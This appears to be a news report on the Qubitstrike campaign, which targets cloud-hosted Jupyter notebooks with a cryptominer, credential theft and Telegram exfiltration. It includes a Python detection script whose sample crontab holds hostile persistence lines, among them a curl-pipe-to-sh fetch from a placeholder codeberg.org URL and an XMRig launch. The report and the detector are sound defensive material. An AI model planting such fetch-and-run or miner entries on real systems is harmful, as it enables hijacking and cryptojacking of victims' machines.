As reported by Cado Security, cybercriminals are spreading the Qubitstrike malware to Jupyter notebooks. The attack apparently takes advantage of the cloud environments in which these notebooks run, targeting the victims' credentials and other sensitive information.
Attacks involving this malicious agent can also include the download of additional malware, which makes the campaign potentially very dangerous and difficult to stop. The attackers' priority, however, apparently remains installing a cryptominer on infected machines. Cado researchers have observed that the attackers use stolen cloud service provider (CSP) credentials to attack notebooks, or specially crafted phishing e-mails.
After successfully infiltrating a system, the malware establishes a connection to a remote C2 server to control the compromised host. The attackers then exploit the notebooks' ability to execute arbitrary code to run a malicious shell script, mi.sh, disguised as a legitimate data analysis tool. This script retrieves and executes an XMRig miner and ensures that it runs every time the system is rebooted.
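The persistence step described above (a script that re-launches the miner at every reboot) is also where a defender can look for it. The following is an added example, not code from the article or from Cado Security: it classifies lines read from a host's crontab or rc.local using the two indicators the article names (the mi.sh script and XMRig) as strong signals, and treats a download from codeberg.org or Discord inside a scheduled task as a weak signal only, because both are legitimate services. The sample crontab is constructed for the example, and the codeberg.org path in it is a placeholder, not a real repository.

```python
import re
from typing import Iterable, Optional

# Strong indicators taken from the article: the mi.sh dropper script and the XMRig miner.
STRONG_INDICATORS = [r"\bmi\.sh\b", r"xmrig"]
# Weak indicators: legitimate services the article says the campaign uses for
# payload hosting (codeberg.org) and C2 (Discord). They only count when paired
# with a download tool in a scheduled task, to keep false positives down.
WEAK_INDICATORS = [r"codeberg\.org", r"discord(app)?\.com"]
DOWNLOAD_TOOLS = [r"\bcurl\b", r"\bwget\b"]


def _matches_any(patterns: list[str], text: str) -> bool:
    return any(re.search(p, text, re.IGNORECASE) for p in patterns)


def classify_entry(entry: str) -> Optional[str]:
    """Return 'strong', 'weak' or None for one crontab / rc.local line."""
    text = entry.strip()
    if not text or text.startswith("#"):
        return None  # blank line or comment, nothing scheduled here
    if _matches_any(STRONG_INDICATORS, text):
        return "strong"
    if _matches_any(WEAK_INDICATORS, text) and _matches_any(DOWNLOAD_TOOLS, text):
        return "weak"
    return None


def scan_persistence(lines: Iterable[str]) -> list[tuple[str, str]]:
    """Return (level, line) pairs for every scheduled entry that matches an indicator."""
    findings = []
    for line in lines:
        level = classify_entry(line)
        if level:
            findings.append((level, line.strip()))
    return findings


# Constructed sample of what `crontab -l` might return on a compromised host.
# The codeberg.org URL is a placeholder, not an indicator from the article.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/find /tmp -type f -mtime +7 -delete
@reboot /tmp/.analysis/mi.sh
*/5 * * * * /opt/xmrig/xmrig --config /opt/xmrig/config.json
@reboot curl -s https://codeberg.org/PLACEHOLDER-ORG/PLACEHOLDER-REPO/raw/run.sh | sh
"""

if __name__ == "__main__":
    for level, line in scan_persistence(SAMPLE_CRONTAB.splitlines()):
        print(f"[{level}] {line}")
```

Run it against the real output of `crontab -l` for each user, `/etc/crontab`, the `/etc/cron.*` directories and `/etc/rc.local`; a hit on `mi.sh` or `xmrig` in any scheduled entry is worth treating as an incident, while a weak hit only tells you which entries deserve a closer look.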
Qubitstrike and Jupyter notebooks: an unprecedented attack
As already mentioned, however, Qubitstrike is not limited to simple cryptojacking. The attackers can also install additional backdoors and carry out outright identity theft.
Since these are systems used for scientific research, cybercriminals can easily steal research data or alter it at will. Finally, any stolen data is exfiltrated through special Telegram bots.
The Qubitstrike campaign's payloads are hosted on codeberg.org, an alternative Git hosting service, and Discord is used for command-and-control communications.
Cado Security researchers say this is the first time this specific platform has been used for malware operations. The Qubitstrike operation may therefore set a worrying precedent for future campaigns.